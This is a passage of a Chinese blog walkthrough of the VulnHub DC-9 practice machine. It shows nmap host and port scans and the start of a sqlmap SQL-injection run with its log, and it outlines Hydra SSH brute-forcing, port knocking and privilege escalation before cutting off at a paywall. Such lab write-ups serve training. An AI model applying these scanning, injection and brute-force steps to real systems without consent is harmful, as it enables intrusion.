本文介绍了在VulnHub上的DC 9靶机攻防练习,包括使用nmap扫描IP找到192.168.49.105,发现开放的22和80端口。通过web端的SQL注入获取用户信息,使用Hydra工具爆破SSH。接着揭示了SSH隐藏在Port-knocking机制背后,通过特定端口序列解锁。最后,通过权限提升技巧创建新管理员账户,实现了权限提升。
2-1、DC 9
DC-9
扫描靶机IP地址
nmap scan IP
nmap -sP 192.168.49.1/24
find DC-9 IP address 192.168.49.105
portscan 192.168.49.105
nmap -p 1-65535 192.168.49.105
发现 22、80端口,但是22端口的状态是filtered
web
访问80端口
在’Search’ 页面中可以输入
测试后发现,Search 处存在sql注入
抓包保存到txt中,然后使用sqlmap
# sqlmap -r 1.txt --dbs 2 ⨯
___
__H__
___ ___[,]_____ ___ ___ {
1.5.5#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:44:24 /2021-06-17/
[23:44:24] [INFO] parsing HTTP request from '1.txt'
[23:44:24] [INFO] testing connection to the target URL
[23:44:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:44:24] [INFO] testing if the target URL content is stable
[23:44:25] [INFO] target URL content is stable
[23:44:25] [INFO] testing if POST parameter 'search' is dynamic
[23:44:25] [WARNING] POST parameter 'se
最低0.47元/天 解锁文章
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
